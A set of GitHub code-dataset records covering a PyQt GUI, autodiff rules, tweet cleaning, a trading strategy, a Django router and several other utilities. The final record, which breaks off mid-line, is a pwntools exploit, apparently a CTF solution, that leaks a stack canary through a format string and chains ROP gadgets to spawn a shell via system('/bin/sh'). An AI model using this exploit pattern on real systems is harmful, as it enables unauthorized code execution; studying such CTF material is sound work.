self.create_page.setObjectName(\"create_page\")\n self.CRUDPages.addTab(self.create_page, \"\")\n self.update_page = UpdatePage(self)\n self.update_page.setObjectName(\"update_page\")\n self.CRUDPages.addTab(self.update_page, \"\")\n self.delete_page = DeletePage(self)\n self.delete_page.setObjectName(\"delete_page\")\n self.CRUDPages.addTab(self.delete_page, \"\")\n self.read_page = ReadPage()\n self.read_page.setObjectName(\"read_page\")\n self.CRUDPages.addTab(self.read_page, \"\")\n self.verticalLayout.addWidget(self.CRUDPages)\n 
self.verticalLayout_2.addLayout(self.verticalLayout)\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\n spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout_2.addItem(spacerItem1)\n self.back_menu = QtWidgets.QPushButton(self)\n self.back_menu.setMinimumSize(QtCore.QSize(100, 25))\n self.back_menu.setMaximumSize(QtCore.QSize(100, 16777215))\n self.back_menu.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.back_menu.setCheckable(False)\n self.back_menu.setObjectName(\"back_menu\")\n self.horizontalLayout_2.addWidget(self.back_menu)\n self.verticalLayout_2.addLayout(self.horizontalLayout_2)\n self.verticalLayout_3.addLayout(self.verticalLayout_2)\n\n self.retranslateUi()\n self.CRUDPages.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(self)\n\n def retranslateUi(self):\n _translate = QtCore.QCoreApplication.translate\n self.setWindowTitle(_translate(\"self\", \"Form\"))\n self.label.setText(_translate(\"self\", \"Current table\"))\n self.CRUDPages.setTabText(self.CRUDPages.indexOf(self.create_page), _translate(\"self\", \"Create\"))\n self.CRUDPages.setTabText(self.CRUDPages.indexOf(self.update_page), _translate(\"self\", \"Update\"))\n self.CRUDPages.setTabText(self.CRUDPages.indexOf(self.delete_page), _translate(\"self\", \"Delete\"))\n self.CRUDPages.setTabText(self.CRUDPages.indexOf(self.read_page), _translate(\"self\", \"Read\"))\n self.back_menu.setText(_translate(\"self\", \"Back to menu\"))\n\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n\n ui = CRUDScreen()\n ui.setup_ui()\n ui.show()\n sys.exit(app.exec_())\n","repo_name":"Proxypepe/mini_dbms_gui","sub_path":"src/views/crud_frame.py","file_name":"crud_frame.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4918905366","text":"from minitf import kernel as K\nfrom minitf.autodiff.vjp_maker import def_vjp_maker\n\n\n# Stolen from autograd library\ndef unbroadcast(target, g):\n while K.rank(g) > K.rank(target):\n g = K.reduce_sum(g, axis=0)\n for axis, size in enumerate(K.shape(target)):\n if size == 1:\n g = K.reduce_sum(g, axis=axis, keepdims=True)\n return g\n\n\ndef balanced_eq(x, z, y):\n return (x == z) / (1.0 + (x == y))\n\n\ndef_vjp_maker(K.add, lambda ans, x, y: (\n lambda g: unbroadcast(x, g),\n lambda g: unbroadcast(y, g),\n))\n\ndef_vjp_maker(K.subtract, lambda ans, x, y: (\n lambda g: unbroadcast(x, g),\n lambda g: unbroadcast(y, -g),\n))\n\ndef_vjp_maker(K.multiply, lambda ans, x, y: (\n lambda g: unbroadcast(x, y * g),\n lambda g: unbroadcast(y, x * g),\n))\n\ndef_vjp_maker(K.divide, lambda ans, x, y: (\n lambda g: unbroadcast(x, g / y),\n lambda g: unbroadcast(y, -g * x / (y * y)),\n))\n\ndef_vjp_maker(K.dot, lambda ans, x, y: (\n lambda g: K.dot(g, K.transpose(y)),\n lambda g: K.dot(K.transpose(x), g),\n))\n\ndef_vjp_maker(K.square, lambda ans, x: (\n lambda g: g * 2 * x,\n))\n\n# Need to update.\ndef_vjp_maker(K.reduce_mean, lambda ans, x: (\n lambda g: g / K.size(x),\n))\n\ndef_vjp_maker(K.exp, lambda ans, x: (\n lambda g: ans * g,\n))\n\ndef_vjp_maker(K.negative, lambda ans, x: (\n lambda g: -g,\n))\n\ndef_vjp_maker(K.transpose, lambda ans, x: (\n lambda g: K.transpose(g),\n))\n\ndef_vjp_maker(K.maximum, lambda ans, x, y: (\n lambda g: unbroadcast(x, g * balanced_eq(x, ans, y)),\n lambda g: unbroadcast(y, 
g * balanced_eq(y, ans, x)),\n))\n\ndef_vjp_maker(K.minimum, lambda ans, x, y: (\n lambda g: unbroadcast(x, g * balanced_eq(x, ans, y)),\n lambda g: unbroadcast(y, g * balanced_eq(y, ans, x)),\n))\n\ndef_vjp_maker(K.cast, lambda ans, x, dtype: (\n lambda g: K.cast(g, x.dtype),\n))\n\ndef_vjp_maker(K.reshape, lambda ans, x, shape: (\n lambda g: K.reshape(g, K.shape(x)),\n))\n\ndef_vjp_maker(K.flatten, lambda ans, x: (\n lambda g: K.reshape(g, K.shape(x)),\n))\n\ndef_vjp_maker(K.where, lambda ans, c, x, y: (\n lambda g: None, # no vjp for condition parameter\n lambda g: K.where(c, g, K.zeros_like(g)),\n lambda g: K.where(c, K.zeros_like(g), g),\n))\n","repo_name":"guocuimi/minitf","sub_path":"minitf/vjps/primitive_vjps.py","file_name":"primitive_vjps.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"20907767709","text":"import csv\nimport re\n\nbase_dir = \"/Users/sujaybhowmick/development/courses/mlnd/MLND-Capstone/twitter-sentiment-analysis\"\npreprocessed_tweets = []\n\ndef clean_tweet(tweet):\n #tweet = row[1]\n new_tweet = ''\n for word in tweet.split():\n # String preprocessing\n if re.match('^.*@.*', word):\n word = '<NAME/>'\n if re.match('^.*http[s]?://.*', word):\n word = '<LINK/>'\n word = word.replace('#', '<HASHTAG/> ')\n word = word.replace('"', ' \\\" ')\n word = word.replace('&', ' & ')\n word = word.replace('>', ' > ')\n word = word.replace('<', ' < ')\n new_tweet = ' '.join([new_tweet, word])\n tweet = new_tweet.strip().strip(\".\")\n return tweet\n\n\ndef clean_str(cleaned_tweet):\n \"\"\"\n Tokenizes common abbreviations and punctuation, removes unwanted characters.\n Returns the clean string.\n \"\"\"\n # string = re.sub(r\"[^A-Za-z0-9(),!?\\'\\`]\", \" \", cleaned_tweet)\n string = re.sub(r'(.)\\1+', r'\\1\\1', cleaned_tweet)\n string = re.sub(r\"\\'s\", \" \\'s\", string)\n string = re.sub(r\"\\'ve\", \" \\'ve\", string)\n string = re.sub(r\"n\\'t\", \" n\\'t\", string)\n string = re.sub(r\"\\'re\", \" \\'re\", string)\n string = re.sub(r\"\\'d\", \" \\'d\", string)\n string = re.sub(r\"\\'ll\", \" \\'ll\", string)\n string = re.sub(r\",\", \" , \", string)\n string = re.sub(r\"!\", \" ! \", string)\n string = re.sub(r\"\\(\", \" \\( \", string)\n string = re.sub(r\"\\)\", \" \\) \", string)\n string = re.sub(r\"\\?\", \" \\? 
\", string)\n string = re.sub(r\"\\s{2,}\", \" \", string)\n string = re.sub(r\"“”¨«»®´·º½¾¿¡§£₤‘’\", \"\", string)\n return string.strip().lower()\n\n\ndef preprocess_csv_file(file_in):\n with open(file_in, \"r\", encoding=\"latin-1\") as csv_file:\n reader = csv.reader(csv_file)\n next(reader)\n for row in reader:\n cleaned_tweet = clean_tweet(clean_str(row[1]))\n preprocessed_tweets.append([row[0], cleaned_tweet, row[2]])\n\n\nif __name__ == \"__main__\":\n twitter_date_file_in = \"/Users/sujaybhowmick/development/courses/mlnd/MLND-Capstone/twitter-sentiment-analysis/data_formatted/twitter_tweets.csv\"\n preprocess_csv_file(twitter_date_file_in)\n with open(base_dir + \"/preprocessed_tweets.csv\", mode=\"a\", encoding=\"latin-1\") as csv_file_w:\n writer = csv.writer(csv_file_w)\n writer.writerow([\"msg_id\", \"content\", \"label\"])\n for row_w in preprocessed_tweets:\n writer.writerow(row_w)\n print(\"Total Preprocessed Tweets:\", len(preprocessed_tweets))\n preprocessed_tweets.clear()\n","repo_name":"sujaybhowmick/twitter_sentiment_analysis","sub_path":"data_helpers/preprocess_tw_csv.py","file_name":"preprocess_tw_csv.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43771602943","text":"\n\nfrom cffi import FFI\nimport random\nfrom sys import exit, platform\nimport cv2\nimport numpy as np\nimport utils\n\nmcclib = utils.ffi_module_import( 'build/mcclib/libmcclib' )\n\n\ndef find( image ):\n r\"\"\"Find: Patch Color Recognition and Pose Estimation\n Args:\n image: image path or image \n min_error:\n min_resolution: \n box: return box of colorchecker \n \"\"\"\n\n img = image\n ub_img = img.reshape(-1,1).astype('ubyte')\n box = np.zeros( (8), dtype=np.float32 )\n\n ffi = FFI() \n ffi_ub_img = ffi.cast(\"unsigned char *\", ub_img.ctypes.data)\n ffi_f_box = ffi.cast(\"float *\", box.ctypes.data)\n\n mcclib.wmccfind( \n ffi_ub_img, # image\n img.shape[1], # int h, int w, \n img.shape[0], \n ffi_f_box, # float *box,\n 2.0, # float f_min_error,\n 1, # unsigned int ui_num_checker,\n 1500 # unsigned int ui_min_resolution \n )\n\n # array to vector\n box = np.array([ \n [box[0], box[1]], \n [box[2], box[3]], \n [box[4], box[5]], \n [box[6], box[7]] \n ]).astype(int)\n\n return box\n\n\n","repo_name":"pedrodiamel/colorchecker-detection","sub_path":"colorchecker.py","file_name":"colorchecker.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"44"} +{"seq_id":"22227998191","text":"# --- Do not remove these libs ---\nfrom freqtrade.strategy.interface import IStrategy\nfrom typing import Dict, List\nfrom functools import reduce\nfrom pandas import DataFrame\n# --------------------------------\n\nimport datetime\nimport talib.abstract as ta\nimport freqtrade.vendor.qtpylib.indicators as qtpylib\nimport numpy # noqa\n\n\nclass Maro4hBbAdxMacd(IStrategy):\n\n max_open_trades = 1\n stake_amount = 1000\n # Minimal ROI designed for the strategy.\n # This attribute will be overridden if the config file contains \"minimal_roi\"\n\n minimal_roi = {\n \"0\": 100\n }\n # Optimal stoploss designed for the strategy\n # This attribute will be overridden if the config file contains \"stoploss\"\n stoploss = -100\n\n # Optimal timeframe for the strategy\n timeframe = '4h'\n\n # trailing stoploss\n trailing_stop = False\n trailing_stop_positive = 0.1\n trailing_stop_positive_offset = 0.2\n\n # run \"populate_indicators\" 
only for new candle\n process_only_new_candles = False\n\n # Experimental settings (configuration will overide these if set)\n use_sell_signal = True\n sell_profit_only = False\n ignore_roi_if_buy_signal = False\n\n # Optional order type mapping\n order_types = {\n 'buy': 'limit',\n 'sell': 'limit',\n 'stoploss': 'market',\n 'stoploss_on_exchange': False\n }\n\n def informative_pairs(self):\n return [(\"BTC/USD\", \"4h\"), (\"ETH/USD\", \"4h\")]\n\n def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n \"\"\"\n Adds several different TA indicators to the given DataFrame\n Performance Note: For the best performance be frugal on the number of indicators\n you are using. Let uncomment only the indicator you are using in your strategies\n or your hyperopt configuration, otherwise you will waste your memory and CPU usage.\n \"\"\"\n\n bollinger = qtpylib.bollinger_bands(qtpylib.typical_price(dataframe), window=20, stds=2)\n dataframe['bb_lowerband'] = bollinger['lower']\n dataframe['bb_upperband'] = bollinger['upper']\n\n dataframe['adx'] = ta.ADX(dataframe, timeperiod=14)\n dataframe['di_plus'] = ta.PLUS_DI(dataframe, timeperiod=14)\n dataframe['di_minus'] = ta.MINUS_DI(dataframe, timeperiod=14)\n\n # MACD\n macd = ta.MACD(dataframe)\n dataframe['macd'] = macd['macd']\n dataframe['macdsignal'] = macd['macdsignal']\n dataframe['macdhist'] = macd['macdhist']\n\n return dataframe\n\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n \"\"\"\n Based on TA indicators, populates the buy signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n\n dataframe.loc[\n (\n ((qtpylib.crossed_above(dataframe['close'],dataframe['bb_lowerband'])) &\n (dataframe['adx'] < 25)) |\n ((qtpylib.crossed_above(dataframe['macdhist'],0)) &\n (dataframe['adx'] >= 25))\n ),'buy'] = 1\n\n return dataframe\n\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n \"\"\"\n Based on TA indicators, populates the sell signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[\n (\n ((qtpylib.crossed_below(dataframe['close'],dataframe['bb_upperband'])) &\n (dataframe['adx'] < 25))|\n ((qtpylib.crossed_below(dataframe['macdhist'], 0)) &\n (dataframe['adx'] >= 25))\n )\n ,'sell'] = 1\n\n return dataframe","repo_name":"Kamelchahbi/Freqtrade_strategies","sub_path":"Maro4h_bb_macd_adx.py","file_name":"Maro4h_bb_macd_adx.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"17420467938","text":"#!/usr/bin/env python\n\nimport webmapper_http_server as server\nimport mapper\nimport sys\n\nif 'tracing' in sys.argv[1:]:\n server.tracing = True\n\nmonitor = mapper.monitor()\n\ndef on_device(dev, action):\n if action == mapper.MDB_NEW:\n server.send_command(\"new_device\", dev)\n if action == mapper.MDB_REMOVE:\n server.send_command(\"del_device\", dev)\n\ndef on_signal(sig, action):\n if action == mapper.MDB_NEW:\n server.send_command(\"new_signal\", sig)\n if action == mapper.MDB_REMOVE:\n server.send_command(\"del_signal\", sig)\n\ndef on_link(link, action):\n if action == mapper.MDB_NEW:\n server.send_command(\"new_link\", link)\n if action == mapper.MDB_REMOVE:\n server.send_command(\"del_link\", link)\n\ndef on_connection(con, action):\n if action == mapper.MDB_NEW:\n server.send_command(\"new_connection\", con)\n if action == 
mapper.MDB_MODIFY:\n server.send_command(\"mod_connection\", con)\n if action == mapper.MDB_REMOVE:\n server.send_command(\"del_connection\", con)\n\ndef set_connection(con):\n if con.has_key('mode'):\n con['mode'] = {'bypass': mapper.MO_BYPASS,\n 'linear': mapper.MO_LINEAR,\n 'calibrate': mapper.MO_CALIBRATE,\n 'expression': mapper.MO_EXPRESSION}[con['mode']]\n monitor.modify(con)\n\nmonitor.db.add_device_callback(on_device)\nmonitor.db.add_signal_callback(on_signal)\nmonitor.db.add_link_callback(on_link)\nmonitor.db.add_mapping_callback(on_connection)\n\nserver.add_command_handler(\"all_devices\",\n lambda x: (\"all_devices\",\n list(monitor.db.all_devices())))\n\nserver.add_command_handler(\"all_signals\",\n lambda x: (\"all_signals\",\n list(monitor.db.all_inputs())\n + list(monitor.db.all_outputs())))\n\nserver.add_command_handler(\"all_links\",\n lambda x: (\"all_links\",\n list(monitor.db.all_links())))\n\nserver.add_command_handler(\"all_connections\",\n lambda x: (\"all_connections\",\n list(monitor.db.all_mappings())))\n\nserver.add_command_handler(\"set_connection\", set_connection)\n\nserver.add_command_handler(\"link\",\n lambda x: monitor.link(*map(str,x)))\n\nserver.add_command_handler(\"unlink\",\n lambda x: monitor.unlink(*map(str,x)))\n\nserver.add_command_handler(\"connect\",\n lambda x: monitor.connect(*map(str,x)))\n\nserver.add_command_handler(\"disconnect\",\n lambda x: monitor.disconnect(*map(str,x)))\n\nserver.serve(port=8000, poll=lambda: monitor.poll(100))\n","repo_name":"vijayrudraraju/vizmapper","sub_path":"webmapper.py","file_name":"webmapper.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"9986884276","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n c=0\n dum=ListNode(0)\n cur=dum\n while l1 or l2:\n carry=c\n if l1 and l2:\n carry+=(l1.val+l2.val)\n l1=l1.next\n l2=l2.next\n elif l1:\n carry+=l1.val\n l1=l1.next\n elif l2:\n carry+=l2.val\n l2=l2.next\n c=carry//10\n cur.next=ListNode(carry%10)\n cur=cur.next\n if c:\n cur.next=ListNode(1)\n return dum.next\n\n \n ","repo_name":"mulukenhailu/competitive-programming","sub_path":"0002-add-two-numbers/0002-add-two-numbers.py","file_name":"0002-add-two-numbers.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37325701289","text":"\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework import permissions\nfrom rest_framework.routers import DefaultRouter\nfrom drf_yasg import openapi\nfrom drf_yasg.views import get_schema_view\n\nfrom main.views import *\n\nrouter = DefaultRouter()\nrouter.register('posts', PostViewSet)\nrouter.register('comments', CommentViewSet)\nrouter.register('likes', LikesViewSet)\nrouter.register('rating', RatingViewSet)\n\n\nschema_view = get_schema_view(\n openapi.Info(\n title='SocialNetwork Api',\n default_version='v1',\n description=\"Test description\",\n terms_of_service=\"https://www.google.com/policies/terms/\",\n contact=openapi.Contact(email=\"contact@snippets.local\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n 
permission_classes=(permissions.AllowAny,),\n)\n\nurlpatterns = [\n path('', schema_view.with_ui()),\n path('admin/', admin.site.urls),\n path('api/v1/account/', include('account.urls')),\n path('api/v1/', include(router.urls)),\n path('api/v1/news/', ParsingView.as_view()),\n]\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","repo_name":"Jannet717/SocialNetwork","sub_path":"network_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33075904878","text":"from src.snake import Snake\nfrom src.evolution import ES\n\n\ndef train(args, env):\n nn_shape = [args.fov, args.hidden_layers, args.layer_size, 2] # 2 is the action space\n # the function that will be optimized\n F = lambda gen: Snake(nn_shape, genotype=gen).get_score(env, args.eval_games)\n # randomly initialized genotype theta\n theta = Snake(nn_shape).get_genotype()\n # instance of evolution strategies\n es = ES(args.lr, args.std, args.population_size, F, theta)\n # optimize theta\n for step in range(args.es_steps):\n score = es.step()\n print(\"Step: \", step+1, \"/\", args.es_steps, \"Fitness:\", \"{:.2f}\".format(score * 100))\n # save theta\n Snake(nn_shape, genotype=es.theta).save_genotype(args.save_file)\n","repo_name":"JaroslavUrbann/FIT_CTU","sub_path":"BI-ZUM/snake/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36041253273","text":"import json\r\nimport os\r\nimport logging\r\n\r\n\r\nclass SettingsIface(object):\r\n def __init__(self, d=None):\r\n # SETTINGS DEFAULTS\r\n self.move_tasks_file_path = 'move_tasks.json'\r\n self.log_level = 2\r\n # DEFAULTS END\r\n if d:\r\n for a, b in d.items():\r\n if isinstance(b, (list, tuple)):\r\n setattr(self, a, [SettingsIface(x) if isinstance(x, dict) else x for x in b])\r\n else:\r\n setattr(self, a, SettingsIface(b) if isinstance(b, dict) else b)\r\n\r\n def json(self):\r\n return json.dumps(self.__dict__)\r\n\r\n\r\nclass Settings:\r\n SETTINGS_FILE_PATH = 'settings.json'\r\n\r\n def __init__(self, check_settings_file=True):\r\n if check_settings_file:\r\n self.write_default_settings()\r\n\r\n def settings_file_exists(self):\r\n return os.path.exists(self.SETTINGS_FILE_PATH)\r\n\r\n def write_default_settings(self, force_overwrite=False):\r\n \"\"\"Writes default settings to file as JSON\"\"\"\r\n if self.settings_file_exists() and not force_overwrite:\r\n logging.out(\"Settings file found / force_overwrite not enabled, skipping step.\", 4)\r\n return\r\n logging.out(\"Settings file not found / force_overwrite enabled, creating default as {0}\"\r\n .format(self.SETTINGS_FILE_PATH), 1, True)\r\n settings_json = json.dumps(SettingsIface().__dict__)\r\n file = open(self.SETTINGS_FILE_PATH, 'w')\r\n file.write(settings_json)\r\n file.close()\r\n\r\n def get_settings(self) -> SettingsIface:\r\n \"\"\"Returns user settings from file cast into a SettingsIface object\"\"\"\r\n try:\r\n settings_json = open(self.SETTINGS_FILE_PATH, 'r').read()\r\n return SettingsIface(json.loads(settings_json))\r\n except FileNotFoundError:\r\n logging.out('Could not get settings. 
Does the file exist?', 0, True)\r\n","repo_name":"ioawnen/fileMover2","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28039937049","text":"from __future__ import print_function\nimport os\nimport random\nimport string\nimport sys\n\nfrom yoyo.compat import configparser\nfrom yoyo.config import CONFIG_EDITOR_KEY\n\ntry:\n import termios\n\n def getch():\n \"\"\"\n Read a single character without echoing to the console and without\n having to wait for a newline.\n \"\"\"\n fd = sys.stdin.fileno()\n saved_attributes = termios.tcgetattr(fd)\n try:\n attributes = termios.tcgetattr(fd) # get a fresh copy!\n attributes[3] = attributes[3] & ~(termios.ICANON | termios.ECHO)\n attributes[6][termios.VMIN] = 1\n attributes[6][termios.VTIME] = 0\n termios.tcsetattr(fd, termios.TCSANOW, attributes)\n\n a = sys.stdin.read(1)\n finally:\n # be sure to reset the attributes no matter what!\n termios.tcsetattr(fd, termios.TCSANOW, saved_attributes)\n return a\n\nexcept ImportError:\n # some non Windows environments don't have termios (google cloud)\n # running yoyo through the python sdk should not require `getch`\n try:\n from msvcrt import getch\n except:\n pass\n\n\ndef prompt(prompt, options):\n \"\"\"\n Display the given prompt and list of options and return the user selection.\n \"\"\"\n\n while True:\n sys.stdout.write(\"%s [%s]: \" % (prompt, options))\n sys.stdout.flush()\n ch = getch()\n if ch == '\\n':\n ch = ([o.lower() for o in options if 'A' <= o <= 'Z'] +\n list(options.lower()))[0]\n print(ch)\n if ch.lower() not in options.lower():\n print(\"Invalid response, please try again!\")\n else:\n break\n\n return ch.lower()\n\n\ndef confirm(s, default=None):\n options = 'yn'\n if default:\n default = default.lower()\n if default == 'y':\n options = 'Yn'\n elif default == 'n':\n options = 'yN'\n return prompt(s, options) == 'y'\n\n\ndef plural(quantity, one, plural):\n \"\"\"\n >>> plural(1, '%d dead frog', '%d dead frogs')\n '1 dead frog'\n >>> plural(2, '%d dead frog', '%d dead frogs')\n '2 dead frogs'\n \"\"\"\n if quantity == 1:\n return one.replace('%d', '%d' % quantity)\n return plural.replace('%d', '%d' % quantity)\n\n\ndef get_editor(config):\n \"\"\"\n Return the user's preferred visual editor\n \"\"\"\n try:\n return config.get('DEFAULT', CONFIG_EDITOR_KEY)\n except configparser.NoOptionError:\n pass\n for key in ['VISUAL', 'EDITOR']:\n editor = os.environ.get(key, None)\n if editor:\n return editor\n return 'vi'\n\n\ndef get_random_string(length, chars=(string.ascii_letters + string.digits)):\n \"\"\"\n Return a random string of ``length`` characters\n \"\"\"\n rng = random.SystemRandom()\n return ''.join(rng.choice(chars) for i in range(length))\n","repo_name":"emurphy/yoyo","sub_path":"yoyo/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1108246063","text":"from kontrachent import Kontrachent\nimport json\nimport os\nif __name__ == \"__main__\":\n print(\"Kontrachenci\")\n while True:\n print(\"Wybierz co chesz zrobić:\\n[0] Wyjście\\n[1]Dodaj kontrachenta\\n[2]Wyszukaj kontrachenta\\n[3]Usuń kontrachenta\\n[4]Pokaż kontrachentów\")\n try:\n opcja = int(input(\"Podaj numerek: \"))\n except:\n print(\"Nieprawidłowy numerek!\")\n continue\n if(opcja==0):\n break\n elif opcja==1:\n nazwa=input(\"Podaj 
nazwę kontrachenta: \")\n poczta=input(\"Podaj kod pocztowy kontrachenta: \")\n miasto=input(\"Podaj z jakiego miasta jest kontrachent: \")\n ulica=input(\"Podaj na jakiej ulicy znajduje się siedziba: \")\n osoba=input(\"Podaj osobę kontaktową: \")\n mail=input(\"Podaj maila do tej osoby: \")\n telefon=input(\"Podaj telefon do tej osoby: \")\n if os.path.isfile(\"./baza.json\"):\n file = open(\"baza.json\", \"r\")\n read = file.read()\n file.close()\n if read == \"\":\n file = open(\"baza.json\", \"rb+\")\n st = \"[\" + json.dumps(Kontrachent(nazwa,poczta,miasto,ulica,osoba,mail,telefon).__dict__) + \"]\"\n file.write(st.encode())\n file.close()\n if read == \"[]\":\n file = open(\"baza.json\", \"rb+\")\n file.seek(-1,2)\n st = json.dumps(Kontrachent(nazwa,poczta,miasto,ulica,osoba,mail,telefon).__dict__) + \"]\"\n file.write(st.encode())\n file.close()\n else:\n file = open(\"baza.json\", \"rb+\")\n file.seek(-1,2)\n st = \",\"+json.dumps(Kontrachent(nazwa,poczta,miasto,ulica,osoba,mail,telefon).__dict__) + \"]\"\n file.write(st.encode())\n file.close()\n else:\n file = open(\"baza.json\", \"w+\")\n file.write(\"[\")\n file.write(json.dumps(Kontrachent(nazwa,poczta,miasto,ulica,osoba,mail,telefon).__dict__))\n file.write(\"]\")\n file.close()\n elif opcja==2:\n try:\n file = open(\"baza.json\", \"r+\")\n arr = json.loads(file.read())\n file.close()\n except:\n arr=[]\n kontrahenci =[]\n for kontrahent in arr:\n kontrahenci.append(Kontrachent(kontrahent[\"nazwa\"],kontrahent[\"poczta\"],kontrahent[\"miasto\"],kontrahent[\"ulica\"],kontrahent[\"imie\"],kontrahent[\"mail\"],kontrahent[\"telefon\"]))\n print(\"[0] Po nazwie\\n[1] Po mieście\\n[2] Po osobie\\n[3] Po mailu\")\n try:\n num = int(input(\"Po czym wyszukać? \"))\n except:\n num=5\n if num==0:\n nazwa= input(\"Podaj nazwe kontrachenta aby wyszukać: \")\n for kontrahent in kontrahenci:\n if nazwa.lower() in kontrahent.nazwa.lower():\n kontrahent.wyswietl()\n elif num==1:\n nazwa= input(\"Podaj miasto kontrachenta aby wyszukać: \")\n for kontrahent in kontrahenci:\n if nazwa.lower() in kontrahent.miasto.lower():\n kontrahent.wyswietl()\n elif num==2:\n nazwa= input(\"Podaj osobę aby wyszukać: \")\n for kontrahent in kontrahenci:\n if nazwa.lower() in kontrahent.imie.lower():\n kontrahent.wyswietl()\n elif num==3:\n nazwa= input(\"Podaj mail kontrachenta aby wyszukać: \")\n for kontrahent in kontrahenci:\n if nazwa.lower() in kontrahent.mail.lower():\n kontrahent.wyswietl()\n elif opcja==3: #usuwanie\n try:\n file = open(\"baza.json\", \"r+\")\n arr = json.loads(file.read())\n file.close()\n except:\n arr=[]\n kontrahenci =[]\n for kontrahent in arr:\n kontrahenci.append(Kontrachent(kontrahent[\"nazwa\"],kontrahent[\"poczta\"],kontrahent[\"miasto\"],kontrahent[\"ulica\"],kontrahent[\"imie\"],kontrahent[\"mail\"],kontrahent[\"telefon\"]))\n\n usun = input(\"Podaj nazwę kontrachenta do usunięcia: \")\n for i in range(len(kontrahenci)):\n if kontrahenci[i].nazwa.lower()==usun.lower():\n del kontrahenci[i]\n print(\"Usunięto\")\n break\n file = open(\"baza.json\", \"w+\")\n file.write(\"[\")\n for i in range(len(kontrahenci)):\n if i ==0:\n file.write(json.dumps(kontrahenci[i].__dict__))\n else:\n file.write(\",\" + json.dumps(kontrahenci[i].__dict__))\n file.write(\"]\")\n file.close()\n\n elif opcja==4:\n try:\n file = open(\"baza.json\", \"r\")\n arr = json.loads(file.read())\n file.close()\n except:\n arr=[]\n kontrahenci =[]\n for kontrahent in arr:\n 
kontrahenci.append(Kontrachent(kontrahent[\"nazwa\"],kontrahent[\"poczta\"],kontrahent[\"miasto\"],kontrahent[\"ulica\"],kontrahent[\"imie\"],kontrahent[\"mail\"],kontrahent[\"telefon\"]))\n\n for kontrahent in kontrahenci:\n kontrahent.wyswietl() \n \n print(\"\\n\")","repo_name":"Faktura179/Faktura179.github.io","sub_path":"Informatyka/Python/Projekt_kontrachenci/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5579,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18716316345","text":"from pwn import *\nfrom LibcSearcher import *\n\nio = remote(\"node4.buuoj.cn\", 25599)\n\npayload = \"%7$p\"\nio.recvuntil(\"I'll give u some gift to help u!\\n\")\nio.sendline(payload)\n\ncanary = int(io.recvuntil(\"\\n\"), 16)\nprint(hex(canary))\n\npop_rdi = 0x400993\nputs_got = 0x601018\nputs_plt = 0x400610\nvuln = 0x0400887\npayload = \"a\"*24 + p64(canary) + p64(0xdeadbeaf)\npayload += p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)\nio.recvuntil(\"story!\\n\")\nio.sendline(payload)\n\naddr = u64(io.recvuntil(\"\\n\")[:-1].ljust(8, \"\\x00\"))\nprint(hex(addr))\n\nlibc = LibcSearcher(\"puts\", addr)\nbase = addr - libc.dump(\"puts\")\nsystem = base + libc.dump(\"system\")\nbinsh = base + libc.dump(\"str_bin_sh\")\n\npayload = \"a\"*24 + p64(canary) + p64(0xdeadbeaf)\npayload += p64(pop_rdi) + p64(binsh) + p64(system) + 